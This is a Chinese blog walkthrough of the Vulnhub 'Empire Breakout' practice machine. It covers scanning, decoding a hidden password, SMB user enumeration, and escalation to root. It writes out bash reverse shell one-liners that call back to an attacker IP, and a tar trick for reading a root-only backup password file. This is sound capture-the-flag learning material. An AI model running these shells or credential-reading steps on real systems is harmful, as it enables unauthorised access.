首页 > 其他分享 >breakout靶机

breakout靶机

时间:2022-10-22 19:47:57浏览次数:66  
标签:tar 提权 breakout pass 靶机 root bash

breakout:https://www.vulnhub.com/entry/empire-breakout,751/
开机显示ip也可以不用扫描 首先使用nmap扫描 去访问网页

使用dirb扫描这个网页发现并没有什么

查看原码发现ook解密

对其进行解码 得到一窜字符记下来,后面有用   在后面加上端口号访问是两个登录界面

 

 

使用enum4linux对网页进行扫描,得到用户名cyber enum4linux(smb专用扫描器)

结合上面解密得到的密码进行登录 在命令行中输入ls可以看见有user.txt文件进行查看可以得到第一个flag 进行提权 bash 反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.157.137/8888 <&1' 先编写 触发 bash -i >& /dev/tcp/ip/1234 0>&1 kali使用nc 进行连接 连接成功开始提权

 

发现一个旧的密码文件,需要root权限才能执行,因为tar命令为root权限而当前用户也可以执行使用tar命令

先将将文件压缩,再解压即可

 tar命令压缩解压该文件  ./tar -czvf pass.zip.gz /var/backups/.old_pass.bak如下最后查看后可得到一串字符

 

 因为是root权限的pass命令的文件所以可能是root密码

su root提权成功

 

 

 

                           

标签:tar,提权,breakout,pass,靶机,root,bash
From: https://www.cnblogs.com/fandt/p/16817121.html

相关文章

  • 靶机: medium_socnet
    靶机:medium_socnet准备工作需要你确定的事情:确定kali已经安装,并且能正常使用【本文不涉及kali安装配置】VirtualBox以前能正常导入虚拟文件ova能正常使用下......
  • vulnhub靶机 AI WEB 2
    vulnhub靶机AI:WEB:2靶场介绍靶场地址:https://www.vulnhub.com/entry/ai-web-2%2C357/主要内容:文件读取、join爆破、命令注入、命令注入传shell、(隐藏文件)敏感文件......
  • 靶场VNH练习(5)Breakout
    靶场名称:Breakout难度:简单目标:拿到root权限下载链接:https://www.vulnhub.com/entry/empire-breakout,751/环境搭建安装好虚拟机,打开就可以看到靶机ip渗透开始首......
  • Five86-3靶机测试记录
    靶机信息靶机下载地址:​​https://www.five86.com/five86-3.html​​下载好靶机解压后,直接打开文件夹里的.ova文件即可将靶机设置为NAT模式后,kali和靶机为同一网段信息搜集......
  • Five86-1靶机测试记录
    靶机信息下载地址:https://www.five86.com/five86-1.html网络连接:NAT,kali和靶机为同一网段下载好靶机解压后,直接运行文件夹里的.ova文件即可信息搜集使用nmap扫描同网段......
  • Empire Breakout学习体会
    申明:本文为靶机EMPIRE:BREAKOUT学习笔记,相关操作仅在测试环境中进行,严禁任何危害网络安全的恶意行为。本文主要记录了一些关键知识点,仅供学习!一、安装说明靶机在https://ww......
  • 【靶机详解】DC-2
    目录环境搭建环境信息渗透思路1信息收集2漏洞发现3漏洞利用知识点汇总参考资料环境搭建下载靶机(DC-2靶机下载)解压后,使用VMware打开,并将攻击机和靶机的网卡,设置为NA......